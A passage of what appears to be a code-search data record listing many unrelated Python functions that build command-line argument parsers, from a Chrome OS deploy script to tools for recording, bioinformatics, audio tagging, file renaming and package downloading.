artifacts to '\n 'deploy from. Typically of format '\n '<chrome_root>/out/Debug. When this option is used, '\n 'the GYP_DEFINES environment variable must be set.')\n parser.add_argument('--target-dir', type='path',\n default=None,\n help='Target directory on device to deploy Chrome into.')\n parser.add_argument('-g', '--gs-path', type='gs_path',\n help='GS path that contains the chrome to deploy.')\n parser.add_argument('--nostartui', action='store_false', dest='startui',\n default=True,\n help=\"Don't restart the ui daemon after deployment.\")\n parser.add_argument('--nostrip', action='store_false', dest='dostrip',\n default=True,\n help=\"Don't strip binaries during deployment. 
Warning: \"\n 'the resulting binaries will be very large!')\n parser.add_argument('-p', '--port', type=int, default=remote.DEFAULT_SSH_PORT,\n help='Port of the target device to connect to.')\n parser.add_argument('-t', '--to',\n help='The IP address of the CrOS device to deploy to.')\n parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Show more debug output.')\n parser.add_argument('--mount-dir', type='path', default=None,\n help='Deploy Chrome in target directory and bind it '\n 'to the directory specified by this flag.'\n 'Any existing mount on this directory will be '\n 'umounted first.')\n parser.add_argument('--mount', action='store_true', default=False,\n help='Deploy Chrome to default target directory and bind '\n 'it to the default mount directory.'\n 'Any existing mount on this directory will be '\n 'umounted first.')\n\n group = parser.add_argument_group('Advanced Options')\n group.add_argument('-l', '--local-pkg-path', type='path',\n help='Path to local chrome prebuilt package to deploy.')\n group.add_argument('--sloppy', action='store_true', default=False,\n help='Ignore when mandatory artifacts are missing.')\n group.add_argument('--staging-flags', default=None, type=ValidateGypDefines,\n help=('Extra flags to control staging. Valid flags are - '\n '%s' % ', '.join(chrome_util.STAGING_FLAGS)))\n # TODO(stevenjb): Remove --strict entirely once removed from the ebuild.\n group.add_argument('--strict', action='store_true', default=False,\n help='Deprecated. Default behavior is \"strict\". Use '\n '--sloppy to omit warnings for missing optional '\n 'files.')\n group.add_argument('--strip-flags', default=None,\n help=\"Flags to call the 'strip' binutil tool with. \"\n \"Overrides the default arguments.\")\n group.add_argument('--ping', action='store_true', default=False,\n help='Ping the device before connection attempt.')\n group.add_argument('--mash', action='store_true', default=False,\n help='Copy additional files for mus+ash. Will not fit in '\n 'the default target-dir.')\n\n group = parser.add_argument_group(\n 'Metadata Overrides (Advanced)',\n description='Provide all of these overrides in order to remove '\n 'dependencies on metadata.json existence.')\n group.add_argument('--target-tc', action='store', default=None,\n help='Override target toolchain name, e.g. '\n 'x86_64-cros-linux-gnu')\n group.add_argument('--toolchain-url', action='store', default=None,\n help='Override toolchain url format pattern, e.g. '\n '2014/04/%%(target)s-2014.04.23.220740.tar.xz')\n\n # GYP_DEFINES that Chrome was built with. Influences which files are staged\n # when --build-dir is set. Defaults to reading from the GYP_DEFINES\n # enviroment variable. WILL BE DEPRECATED.\n parser.add_argument('--gyp-defines', default=None, type=ValidateGypDefines,\n help=argparse.SUPPRESS)\n\n # GN_ARGS (args.gn) used to build Chrome. Influences which files are staged\n # when --build-dir is set. Defaults to reading from the GN_ARGS env variable.\n # CURRENLY IGNORED, ADDED FOR FORWARD COMPATABILITY.\n parser.add_argument('--gn-args', default=None, type=ValidateGnArgs,\n help=argparse.SUPPRESS)\n\n # Path of an empty directory to stage chrome artifacts to. Defaults to a\n # temporary directory that is removed when the script finishes. 
If the path\n # is specified, then it will not be removed.\n parser.add_argument('--staging-dir', type='path', default=None,\n help=argparse.SUPPRESS)\n # Only prepare the staging directory, and skip deploying to the device.\n parser.add_argument('--staging-only', action='store_true', default=False,\n help=argparse.SUPPRESS)\n # Path to a binutil 'strip' tool to strip binaries with. The passed-in path\n # is used as-is, and not normalized. Used by the Chrome ebuild to skip\n # fetching the SDK toolchain.\n parser.add_argument('--strip-bin', default=None, help=argparse.SUPPRESS)\n return parser", "def setup_parser():\r\n parser = argparse.ArgumentParser(description='Freeseer Recording Utility',\r\n formatter_class=argparse.RawTextHelpFormatter)\r\n parser.add_argument(\"-v\", \"--version\", action='version',\r\n version=textwrap.dedent('''\\\r\n Freeseer {version} ({platform})\r\n Python {pymajor}.{pyminor}.{pymicro}\r\n PyGst {pygst_version}\r\n PyQt {pyqt_version}\r\n Qt {qt_version}\r\n Yapsy {yapsy_version}\r\n '''.format(version=__version__,\r\n platform=sys.platform,\r\n pymajor=sys.version_info.major,\r\n pyminor=sys.version_info.minor,\r\n pymicro=sys.version_info.micro,\r\n pygst_version=pygst._pygst_version,\r\n pyqt_version=QtCore.PYQT_VERSION_STR,\r\n qt_version=QtCore.QT_VERSION_STR,\r\n yapsy_version=yapsy.__version__)))\r\n\r\n # Configure Subparsers\r\n subparsers = parser.add_subparsers(dest='app', help='Command List')\r\n setup_parser_record(subparsers)\r\n setup_parser_config(subparsers)\r\n setup_parser_talk(subparsers)\r\n setup_parser_report(subparsers)\r\n setup_parser_upload(subparsers)\r\n return parser", "def build_parser() -> ArgumentParser:\n parser = ArgumentParser(prog=\"bartender\")\n parser.add_argument(\"--version\", action=\"version\", version=version(\"bartender\"))\n subparsers = parser.add_subparsers(dest=\"subcommand\")\n\n serve_sp = subparsers.add_parser(\"serve\", help=\"Serve web service\")\n serve_sp.set_defaults(func=serve)\n\n perform_sp = subparsers.add_parser(\"perform\", help=\"Async Redis queue job worker\")\n perform_sp.add_argument(\n \"--config\",\n default=Path(\"config.yaml\"),\n type=Path,\n help=\"Configuration with schedulers that need arq workers\",\n )\n perform_sp.add_argument(\n \"--destination\",\n nargs=\"+\",\n help=\"\"\"Name of destinations to run workers for.\n Each destination must have `scheduler.type:arq`.\n By default runs workers for all destinations with `scheduler.type:arq`.\"\"\",\n dest=\"destination_names\",\n )\n perform_sp.set_defaults(func=perform)\n\n add_generate_token_subcommand(subparsers)\n\n return parser", "def cmdline_parser():\n\n # http://docs.python.org/dev/howto/argparse.html\n parser = argparse.ArgumentParser(description=__doc__)\n \n parser.add_argument(\"--verbose\",\n action=\"store_true\",\n help=\"Be verbose\")\n parser.add_argument(\"--debug\",\n action=\"store_true\",\n help=\"Enable debugging\")\n parser.add_argument(\"-b\", \"--bam\",\n required=True,\n help=\"Input BAM file matching vcf\")\n parser.add_argument(\"-i\", \"--vcf\",\n help=\"Input VCF file containing variants to analyze\"\n \" (clashes with --var)\")\n parser.add_argument(\"-v\", \"--var\",\n help=\"Report reads for this variant only. 
Format: chr:pos:ref-alt\"\n \" (clashes with --vcf)\")\n default = 0\n parser.add_argument(\"--mq-filter\",\n dest=\"min_mq\",\n type=int,\n default=default,\n help=\"Ignore reads with mapping quality below this value (default=%d)\" % default)\n default = 5\n parser.add_argument(\"--bq-filter\",\n dest=\"min_bq\",\n type=int,\n default=default,\n help=\"Ignore reads with bases below this value (default=%d)\" % default)\n parser.add_argument(\"-a\", \"--use-orphan\",\n action=\"store_true\",\n help=\"Don't ignore orphan-reads / anomalous read-pairs\")\n\n return parser", "def setup_parser(self):\n parser = argparse.ArgumentParser(description=DESCRIPTION)\n parser.add_argument('words', metavar='W', nargs='+', help=POSITIONAL_HELP)\n parser.add_argument('-a','--any', dest=\"search_funct\", action=\"store_const\", \n const='any', default='all', help=SEARCH_HELP)\n parser.add_argument('-o','--only-id', action='store_true', help=ID_HELP)\n parser.add_argument('-u', '--update', action='store_true', help=UPDATE_HELP)\n return parser", "def build_parser(self, add_help=True):\n self.parser = argparse.ArgumentParser(\n description=self.description, add_help=add_help\n )\n self.parser.prog = f\"python -m {self.package}.{self.module_name}\"\n self.parser.add_argument(\n \"config_file\", help=\"Path/name of YAML configuration file for NEMO nowcast.\"\n )", "def _make_parser(self, **kwargs):\n\n kwargs.setdefault('help', self.help)\n kwargs.setdefault('formatter_class',argparse.RawDescriptionHelpFormatter)\n kwargs.setdefault('description', self.description)\n kwargs.setdefault('name', self.name)\n names = (kwargs.get('name') or self.name).split('.')\n \n def _get_subparser(a):\n if a._subparsers:\n for action in a._subparsers._actions:\n if isinstance(action, argparse._SubParsersAction):\n return action\n raise RuntimeError('could not find adequate subparser')\n return a.add_subparsers(dest='command',\n title='commands',\n metavar='COMMAND')\n def _get_parser(node, idx, names):\n name = names[idx]\n if name in node.choices:\n return node.choices[name]\n args = {\n 'name' : name,\n 'help' : 'a group of sub-commands',\n }\n return node.add_parser(**args)\n \n parser = ACMD_PARSER\n node = _get_subparser(parser)\n\n for i,n in enumerate(names[:-1]):\n node = _get_subparser(parser)\n parser = _get_parser(node, i, names)\n \n node = _get_subparser(parser)\n kwargs['name'] = names[-1]\n parser = node.add_parser(**kwargs)\n return parser", "def create_parser():\n parser = argparse.ArgumentParser(\n description='CLI for SMS',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n )\n\n # Add subcommands\n subparsers = parser.add_subparsers(title='subcommands', dest='cmd')\n\n # Downlink Unitdata\n downlink_unitdata_parser = subparsers.add_parser(\n 'DU', help=\"Send downlink unitdata to SMSOrc8rGW service\",\n )\n downlink_unitdata_parser.add_argument('imsi', help='e.g. 001010000090122 (no prefix required)')\n downlink_unitdata_parser.add_argument('data', help='Data as a hex string e.g. 
1fc13a00')\n downlink_unitdata_parser.set_defaults(func=send_downlink_unitdata)\n\n return parser", "def create_parser():\n desc_str = (\n \"\"\"Look at the results of inference with cbayes scripts.\"\"\"\n )\n\n parser = argparse.ArgumentParser(description=desc_str)\n \n parser.add_argument('-dir', '--directory',\n help = 'name of the cbayes ouput directory',\n type = str,\n required = True\n )\n \n # do the parsing\n args = parser.parse_args()\n\n return args", "def get_parser():\n parser = ArgumentParser(description=\"Script used to generate Freeplane \"\n + \"mindmap files\")\n\n # This is use when people in Linaro aren't using their email address.\n parser.add_argument('--disable-altname', required=False,\n action=\"store_true\", default=False,\n help=\"Use alternative names (from cfg.yaml) to the tree\")\n\n parser.add_argument('--assignee', required=False,\n action=\"store_true\", default=False,\n help=\"Add assignees (from cfg.yaml) to the tree\")\n\n parser.add_argument('-a', '--author', required=False,\n action=\"store_true\", default=False,\n help=\"If set, git statistic only count the commit \"\n + \"from the author\")\n\n parser.add_argument('-p', '--path', required=False, action=\"store\",\n default=\"/home/jyx/devel/optee_projects/reference/linux\",\n help='Full path to the kernel tree')\n\n parser.add_argument('-s', '--since', required=False, action=\"store\",\n default=None,\n help='Used with the git log --since command')\n\n parser.add_argument('-o', '--output', required=False, action=\"store\",\n default=\"linux-kernel.mm\",\n help='Output filename')\n\n parser.add_argument('-v', required=False, action=\"store_true\",\n default=False,\n help='Output some verbose debugging info')\n\n return parser", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def command_line():\n version = ' '.join([__version__, __build__])\n parser = ArgumentParser(\n prog='moniker',\n description='Simple batch file renaming tool.',\n )\n parser.add_argument(\n '-v', '--version', action='version',\n version=\"%s v%s\" % (basename(sys.argv[0]), version)\n )\n parser.add_argument(\n '--depth',\n type=int,\n default=0,\n metavar='depth',\n help='Tiers of file heiarcy explored',\n )\n parser.add_argument(\n '--replace',\n nargs=2,\n default=('', ''),\n metavar='replace',\n help='glob pattern to match'\n )\n parser.add_argument(\n 'directory',\n default='.',\n help='target directory root',\n )\n return parser", "def makeParser():\n parser = argparse.ArgumentParser(\n description=(\n \"Print a JSON object containing reference to read \"\n \"distances extracted from a SAM file.\"\n )\n )\n\n parser.add_argument(\n \"--samFile\",\n action=\"append\",\n required=True,\n help=\"The SAM file(s) to load. May be repeated.\",\n )\n\n parser.add_argument(\n \"--minMatchingReads\",\n type=int,\n help=(\n \"The minimum number of reads that must match a reference for it \"\n \"to be included.\"\n ),\n )\n\n parser.add_argument(\n \"--scoreTag\",\n help=(\n \"The score tag to use for the alignment score. If not given, \"\n \"1 will be used to indicate that a read matched a reference \"\n \"(non-matches are not included). The default is no score tag, \"\n 'which is not that useful. 
A good choice is \"AS\", for the '\n \"alignment score, but that has to be present in the SAM file, \"\n \"which means that the aligner (bowtie2, bwa, etc. has to have \"\n \"produced such a tag.\"\n ),\n )\n\n parser.add_argument(\n \"--verbose\", action=\"store_true\", help=\"Print extra information.\"\n )\n\n return parser", "def create_parser():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('manga_name',\n type = str,\n help = \"Input the name of the manga.\"\n )\n parser.add_argument('-b','--begin',\n type = int,\n help = 'Input the starting chapter.Defaults to first chapter.'\n )\n parser.add_argument('-e','--end',\n type = int,\n help = 'Input the ending chapter.Defaults to the last possible chapter.'\n )\n parser.add_argument('-c','--chapter',\n type = int,\n help = 'Provide if you want to download only one chapter.'\n )\n parser.add_argument('-t','--target',\n type = str,\n help = 'The location where manga has to be downloaded.Defaults to the current directory.',\n default = '.'\n )\n parser.add_argument('-s','--site',\n type = str,\n help = 'The site through which the manga has to be downloaded. Defaults to MangaPanda.',\n default = 'mangapanda'\n )\n\n return parser", "def build_parser():\n # Inherit package arguments\n parents = sisr.bin.build_parser(),\n\n parser = argparse.ArgumentParser(\n description=\"Test SiSR super-resolution network\",\n parents=parents)\n\n return parser", "def _create_parser(self):\n default_options = self._create_defaults()\n\n all_categories = ['build', 'whitespace']\n\n mock_stderr = self._MockStdErr()\n\n return ArgumentParser(\n all_categories=all_categories,\n base_filter_rules=[],\n default_options=default_options,\n mock_stderr=mock_stderr,\n usage='test usage')", "def build_args():\n parser = argparse.ArgumentParser(description='Validates, edits, or creates a 22 XML file')\n subparsers = parser.add_subparsers(help='sub-command help')\n \n add_branch_parser(subparsers)\n add_edit_parser(subparsers)\n add_finalize_parser(subparsers)\n add_grade_parser(subparsers)\n add_new_parser(subparsers)\n add_validate_parser(subparsers)\n add_validate_document_parser(subparsers)\n \n return parser.parse_args()", "def generate_main_parser() -> ArgumentParser:\n # Create parser\n parser = ArgumentParser(\n description=\"Command line interface tool for iic2343.\",\n )\n\n # Add version flag\n parser.add_argument(\n \"-v\",\n \"--version\",\n action=\"version\",\n version=f\"iic2343 version {iic2343.__version__}\",\n )\n\n # Create subparsers\n subparsers = parser.add_subparsers(help=\"Action to be executed.\")\n\n # Serial ports subparser\n generate_serial_ports_subparser(subparsers)\n\n return parser", "def build_parser():\n parser = argparse.ArgumentParser(description='Bag reader')\n parser.add_argument('-b', '--bag',\n help='Bag files to read',\n required=True,\n nargs='+',\n type=str)\n parser.add_argument('-i', '--info',\n help='List topics and fields within topics',\n required=False,\n action='store_true')\n parser.add_argument('-s', '--stats',\n help='Display how many messages were published on each topic',\n required=False,\n action='store_true')\n parser.add_argument('-t', '--topic',\n help='Topics to write to csv file',\n required=False,\n action='store',\n nargs='+',\n type=str)\n parser.add_argument('-o', '--output_file',\n help='Output file name',\n required=False,\n action='store',\n nargs='+',\n dest='out_file',\n type=str)\n\n return parser", "def cmd_line_parser():\n usage = \"usage: %prog [options]\\n\"\n opt_parser = 
OptionParser(usage=usage)\n opt_parser.add_option(\"--ai\", action=\"store\", dest=\"alternative_input\",\n help=\"an alternative input file (works only with load_from_pickle)\")\n opt_parser.add_option(\"--dl\", action=\"store\", dest=\"dumped_lexicon\",\n help=\"a dumped lexicon file (works only with load_from_pickle\")\n opt_parser.add_option(\"--dotest\", action=\"store_true\", dest=\"dotest\", default=False,\n help=\"use this flag if you want to apply testing\")\n opt_parser.add_option(\"-t\", action=\"store\", dest=\"test_parses\",\n help=\"the output file for the test parses\")\n opt_parser.add_option(\"-n\", action=\"store\", dest=\"train_parses\",\n help=\"the output file for the train parses\")\n opt_parser.add_option(\"-i\", dest=\"inp_file\", default=\"trainFiles/trainPairs\",\n help=\"the input file names (with the annotated corpus)\")\n opt_parser.add_option(\"--devel\", dest=\"development_mode\", default=False, action=\"store_true\",\n help=\"development mode\")\n\n return opt_parser", "def get_parser(self):\n parser = ArgumentParser()\n parser.add_argument(\n \"-c\", default='', dest='cmd',\n help=(\"just like python -c or sh -c (pass in a command)\"))\n parser.add_argument(\n \"-e\", \"--exec\", default='', dest='execfile',\n help='a filename to execute')\n parser.add_argument(\n \"-v\", '--version', default=False, dest='version',\n action='store_true',\n help=(\"show version information\"))\n parser.add_argument(\"--shell\", dest=\"shell\",\n default=False, help=\"application shell\",\n action='store_true')\n parser.add_argument(\"--config\", dest='config',\n default=\"\",\n help=\"use config file\")\n return parser", "def build_parser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(help='Blogstrap commands')\n init_parser = subparsers.add_parser(\n 'init',\n help='Initialize the Blogstrap directory')\n init_parser.set_defaults(func=init)\n init_parser.add_argument('-t', '--target',\n dest='target',\n type=str,\n default='.',\n help='Target folder to generate files in')\n init_parser.add_argument('--no-homepage',\n action='store_true',\n default=False,\n help='if specified, no homepage will be created')\n run_parser = subparsers.add_parser(\n 'run', help=\"Run the Flask development server\")\n run_parser.set_defaults(func=run)\n run_parser.add_argument('-c', '--config',\n dest='config',\n type=str,\n default=None,\n help='path to a config file')\n\n return parser", "def get_command_line_parser():\n command_line_parser = argparse.ArgumentParser(\n description=\"Execute data workflows defined in flo.yaml files\",\n )\n subcommand_creator = command_line_parser.add_subparsers(\n title='SUBCOMMANDS',\n )\n for command_module in COMMAND_MODULES:\n command = command_module.Command(subcommand_creator)\n\n # this sets a default value for the command \"option\" so\n # that, when this Command is selected by argparse from the\n # command line, we know which comman instance it\n # corresponds with. 
See run_subcommand function below.\n command.option_parser.set_defaults(command=command)\n return command_line_parser", "def generate_parser(renamer):\n parser = ShlexArgumentParser(\n formatter_class=RawDescriptionHelpFormatter,\n prog=\"brp\",\n usage=\"cmd [args ...]\",\n add_help=False,\n exit_on_error=False,\n )\n subparsers = parser.add_subparsers(\n title=\"commands\",\n description=\"actions to take on the filenames\",\n )\n\n _help = [\n _help_parser((\"help\", \"h\", \"?\"), subparsers, renamer),\n _save_parser((\"save\", \"s\"), subparsers, renamer),\n _quit_parser((\"quit\", \"q\", \"exit\"), subparsers, renamer),\n _save_quit_parser((\"write\", \"w\"), subparsers, renamer),\n _print_parser((\"list\", \"ls\", \"l\"), subparsers, renamer),\n _history_parser((\"history\", \"hist\", \"past\"), subparsers, renamer),\n _undo_parser((\"undo\", \"u\"), subparsers, renamer),\n _reset_parser((\"reset\", \"over\", \"o\"), subparsers, renamer),\n _automate_parser((\"automate\", \"a\", \"auto\"), subparsers, renamer),\n _find_replace_parser((\"replace\", \"r\", \"re\", \"reg\", \"regex\"), subparsers, renamer),\n _append_parser((\"append\", \"ap\"), subparsers, renamer),\n _prepend_parser((\"prepend\", \"p\", \"pre\"), subparsers, renamer),\n _insert_parser((\"insert\", \"i\", \"in\"), subparsers, renamer),\n _case_parser((\"case\", \"c\"), subparsers, renamer),\n _extension_parser((\"extension\", \"x\", \"ext\"), subparsers, renamer),\n ]\n\n return parser, _help", "def get_argument_parser(self):\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest='command')\n fetch_parser = subparsers.add_parser('fetch', help='fetches and displays a release from discogs')\n fetch_parser.add_argument('discogs_id', help='the ID of the release')\n rip_parser = subparsers.add_parser('rip', help='rips the current CD to WAV')\n rip_parser.add_argument('--destination', help='optional destination for the CD rip')\n search_parser = subparsers.add_parser(\n 'search',\n prog='search',\n help='performs a very simple search on discogs')\n search_parser.add_argument('term', help='the term to search for')\n encode_parser = subparsers.add_parser(\n 'encode', help='Encodes a CD or a set of WAV files to mp3.')\n encode_parser.add_argument(\n 'encoding_from', choices=['cd', 'wav'], help='The source to encode from.')\n encode_parser.add_argument(\n 'encoding_to', choices=['mp3', 'flac'], help='The destination to encode to.')\n encode_parser.add_argument(\n '--source', help='The destination of the source wav file. This can be a file or directory.')\n encode_parser.add_argument(\n '--destination', help='The destination of the resulting mp3 or flac. This can be a file or directory.')\n encode_parser.add_argument(\n '--keep-source', action='store_true', help='If encoding from wav, use this to keep the original wav being removed.')\n encode_parser.add_argument(\n '--collapse-index-tracks', action='store_true', help='If set this will collapse any subtracks to a single track.')\n encode_parser.add_argument(\n '--discogs-id', help='The discogs ID for the release. When this is used metadata from the discogs release will be applied to the encoded files.')\n decode_parser = subparsers.add_parser('decode', help='Decodes a set of FLAC or MP3 files to WAV.')\n decode_parser.add_argument(\n 'decode_from', choices=['flac', 'mp3'], help='The source to decode from.')\n decode_parser.add_argument(\n '--source', help='The destination of the source file. 
This can be a file or directory.')\n decode_parser.add_argument(\n '--destination', help='The destination of the resulting wav. This can be a file or directory.')\n tag_parser = subparsers.add_parser('tag', help='Tags an audio file')\n tag_parser.add_argument(\n 'action', choices=['add', 'remove'], help='The tagging action to be performed. A tag can be added or removed.')\n tag_parser.add_argument(\n 'format', choices=['mp3', 'flac'], help='The file format of the audio file being tagged.')\n tag_parser.add_argument(\n '--collapse-index-tracks', action='store_true', help='If set this will collapse any subtracks to a single track.')\n tag_parser.add_argument(\n '--source',\n help='The source audio files to tag. This can be a file or a directory. If the source is omitted, the files in the current working directory will be used.')\n tag_parser.add_argument('--discogs-id', help='The discogs ID for the release. When this is used metadata from the discogs release will be applied to the tagged files.')\n tag_parser.add_argument('--artist', help='The artist to use for the tag.')\n tag_parser.add_argument('--album-artist', help='The album artist to use for the tag.')\n tag_parser.add_argument('--album', help='The album to use for the tag.')\n tag_parser.add_argument('--title', help='The title to use for the tag.')\n tag_parser.add_argument('--year', help='The year to use for the tag.')\n tag_parser.add_argument('--genre', help='The year to use for the tag.')\n tag_parser.add_argument('--track-number', help='The track number to use for the tag.')\n tag_parser.add_argument('--track-total', help='The track total to use for the tag.')\n tag_parser.add_argument('--disc-number', help='The disc number to use for the tag.')\n tag_parser.add_argument('--disc-total', help='The disc total to use for the tag.')\n tag_parser.add_argument('--comment', help='The comment for the tag.')\n artwork_parser = subparsers.add_parser('artwork', help='adds or removes artwork from a file')\n artwork_parser.add_argument(\n 'action', choices=['add', 'remove'], help='The artwork action to be performed. The artwork can be added or removed.')\n artwork_parser.add_argument(\n 'type', choices=['mp3', 'flac'], help='The type of file to apply the artwork to.')\n artwork_parser.add_argument(\n '--source', help='The destination file or directory to apply the artwork to. If there is no source then any artwork in the current directory will be used.')\n artwork_parser.add_argument(\n '--destination', help='The destination file or directory to apply the artwork to. If there is no destination then the current directory will be used.')\n mix_parser = subparsers.add_parser('mix', help='adds a mix')\n mix_parser.add_argument('source', help='the source of the mix')\n mix_parser.add_argument('--artist', help='The artist to use for the tag.')\n mix_parser.add_argument('--album', help='The album to use for the mix.')\n mix_parser.add_argument('--title', help='The title to use for the mix.')\n mix_parser.add_argument('--year', help='The year to use for the mix.')\n mix_parser.add_argument('--comment', help='The comment for the mix.')\n return parser", "def make_cli_parser(self):\n super(SaArgParser, self).make_cli_parser()\n self.cli_parser.add_option('--steps', type='int',\n default=mcmc.defaults.NUM_STEPS,\n help=(\"the number of steps to Anneal. \"\n\t\t\t\t\"[default: %default]\")\n )\n self.cli_parser.add_option('--temperature', type='int',\n default=mcmc.defaults.TEMPERATURE,\n help=(\"the starting temperature to anneal from. 
\"\n \"[default: %default]\")\n )\n self.cli_parser.add_option('--end_temperature', type='int',\n default=mcmc.defaults.END_TEMPERATURE,\n help=(\"the temperature to end annealing.\"\n \"[default: %default]\")\n )\n self.cli_parser.add_option('--activity-threshold',\n type='float',\n default=mcmc.defaults.ACTIVITY_THRESHOLD,\n help=(\"set the (differential) expression threshold at \"\n \"which a gene is considered active [default: \"\n \"%default=-log10(0.05)]\")\n )\n self.cli_parser.add_option('--free-parameters',\n action='store_true',\n help=(\"parameters will be adjusted randomly, rather \"\n \"than incrementally\")\n )\n self.cli_parser.add_option('--disable-swaps', action='store_true',\n help=(\"disables swapping links as an option for \"\n \"transitions\")\n )\n self.cli_parser.add_option('--transition-ratio', type='float',\n default=0.9,\n help=(\"The target ratio of proposed link transitions \"\n \"to proposed parameter transitions [default: \"\n \"%default]\"\n )\n )\n self.cli_parser.add_option('--parameters-outfile',\n default=mcmc.defaults.PARAMETERS_OUTFILE,\n help=(\"the file to which the parameters results should \"\n \"be written [default: %default]\")\n )\n self.cli_parser.add_option('--transitions-outfile',\n default=mcmc.defaults.TRANSITIONS_OUTTFILE,\n help=(\"the file to which the transitions data should \"\n \"be written [default: %default]\")\n )\n self.cli_parser.add_option('--detailed-transitions',\n action='store_true',\n help=(\"Transitions file includes full information about \"\n \"each step's state.\")\n )\n self.cli_parser.add_option('--bzip2', action='store_true',\n help=\"compress transitions file using bzip2\"\n )", "def build_parser(self):\n\n p = argparse.ArgumentParser(\n self.TITLE,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n p.add_argument(\n \"--name\",\n metavar=\"NAME\",\n help=\"Public name of the project, for docs etc.\",\n default=argparse.SUPPRESS\n )\n p.add_argument(\n '--id',\n metavar='IDENT',\n help=\"Internal name of the project, for directories etc.\",\n default=argparse.SUPPRESS\n )\n p.add_argument(\n \"--title\",\n metavar=\"TEXT\",\n help=\"One-line title for the project\",\n required=True,\n default=argparse.SUPPRESS\n )\n p.add_argument(\n \"--template\",\n metavar=\"PATH\",\n help=\"Template name or path\",\n default=self.DEFAULT_TEMPLATE\n )\n p.add_argument(\n \"--update\",\n action=\"store_true\",\n help=\"Update an existing project\",\n default=False\n )\n p.add_argument(\n \"--config\",\n metavar=\"PATH\",\n help=\"Configuration to use\",\n default=self.DEFAULT_CONFIG\n )\n p.add_argument(\n \"--dry-run\", \"-n\",\n action=\"store_true\",\n help=\"Don't generate anything, just validate\",\n default=False\n )\n\n return p", "def build_argument_parser():\n description=\"A simple tool to batch rename given files.\"\n parser = ArgumentParser(description=description)\n parser.add_argument(\"-i\", \"--input-list\", required=False,\n help=\"the path to the input list file.\")\n parser.add_argument(\"-p\", \"--glob-pattern\", default=DEFAULT_GLOB_PATTERN,\n help=\"a glob pattern to filter input files.\")\n return parser", "def parser(cls, *args, **kwargs):\n\n parser = ArgumentParser(*args, **kwargs)\n parser.add_argument('-a', \"--address\",\n help=\"Force entry point address\", default=None)\n parser.add_argument('-b', \"--dumpblocs\", action=\"store_true\",\n help=\"Log disasm blocks\")\n parser.add_argument('-z', \"--singlestep\", action=\"store_true\",\n help=\"Log single step\")\n parser.add_argument('-d', 
\"--debugging\", action=\"store_true\",\n help=\"Debug shell\")\n parser.add_argument('-g', \"--gdbserver\", type=int,\n help=\"Listen on port @port\")\n parser.add_argument(\"-j\", \"--jitter\",\n help=\"Jitter engine. Possible values are: gcc (default), tcc, llvm, python\",\n default=\"gcc\")\n parser.add_argument(\n '-q', \"--quiet-function-calls\", action=\"store_true\",\n help=\"Don't log function calls\")\n parser.add_argument('-i', \"--dependencies\", action=\"store_true\",\n help=\"Load PE and its dependencies\")\n\n for base_cls in cls._classes_():\n base_cls.update_parser(parser)\n return parser", "def parse(self, command_line=sys.argv[1:]):\n return self._parser.parse_args(command_line)", "def cmdline_parser():\n parser = argparse.ArgumentParser(description=\"\"\" \"\"\")\n parser.add_argument(\"-g\", \"--gta\",\n help=\"\"\"gta sequences\"\"\",\n dest=\"gta\",\n required=True)\n return parser", "def create_parser():\n parser = argparse.ArgumentParser(description='Watching for files containing magictext')\n parser.add_argument('--ext', help='File extensions to filter on, default=.txt', default='.txt')\n parser.add_argument('--poll', help=\"Polling interval in seconds, default=1.0\", type=float, default=1.0)\n parser.add_argument('directory', help='Directory to watch.')\n parser.add_argument('magictext', help='Text to search for within matching files.')\n return parser", "def setup_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--url\", dest='url', required=True,\n help=\"Falkonry Edge URL\")\n parser.add_argument(\"-i\", \"--input_file\", dest='input', required=True,\n help=\"Input data file to feed into Falkonry Edge Analyzer\")\n parser.add_argument(\"-o\", \"--output_file\", dest='output', required=True,\n help=\"File name to write Falkonry Edge Analyzer output\")\n parser.add_argument(\"-t\", \"--time_column\", dest='time', type=int, required=True,\n help=\"Time column index starting with 0\")\n parser.add_argument(\"-z\", \"--time_zone\", dest='zone', required=True,\n help=\"Time zone\")\n parser.add_argument(\"-f\", \"--time_format\", dest='format', required=True,\n help=\"Timestamp format\")\n parser.add_argument(\"-e\", \"--entity_column\", dest='entity', type=int,\n help=\"Entity column index starting with 0\")\n parser.add_argument(\"-b\", \"--batch_column\", dest='batch', type=int,\n help=\"Batch column index starting with 0\")\n parser.add_argument(\"-r\", \"--input_feed_rate\", dest='rate', type=int, default=1000,\n help=\"Number of records to send to edge per second.\")\n\n return parser", "def build_cli(self):\n parser = argparse.ArgumentParser(\"xsgen\",\n conflict_handler='resolve', argument_default=NotSpecified)\n for plugin in self.plugins:\n plugin.update_argparser(parser)\n self.parser = parser\n return parser", "def get_parser():\n\n parser = argparse.ArgumentParser(description=textwrap.dedent(\"\"\"\n Downloads and tests the md5 and file size of a given version of Anaconda located in\n http://repo.continuum.io/archive/\n\n The version option (-v) allows you to select a specific version of Anaconda to download and test.\n This will include every system's Anaconda distribution for that version (OSX, Windows, Linux)\n\n The --log option will write the results of these tests to a log file. If not enabled, results\n will be written to stdout.\n\n If you already have Anaconda installers inside the pkgs directory and wish to test those without\n downloading new ones, use the --no-download option. 
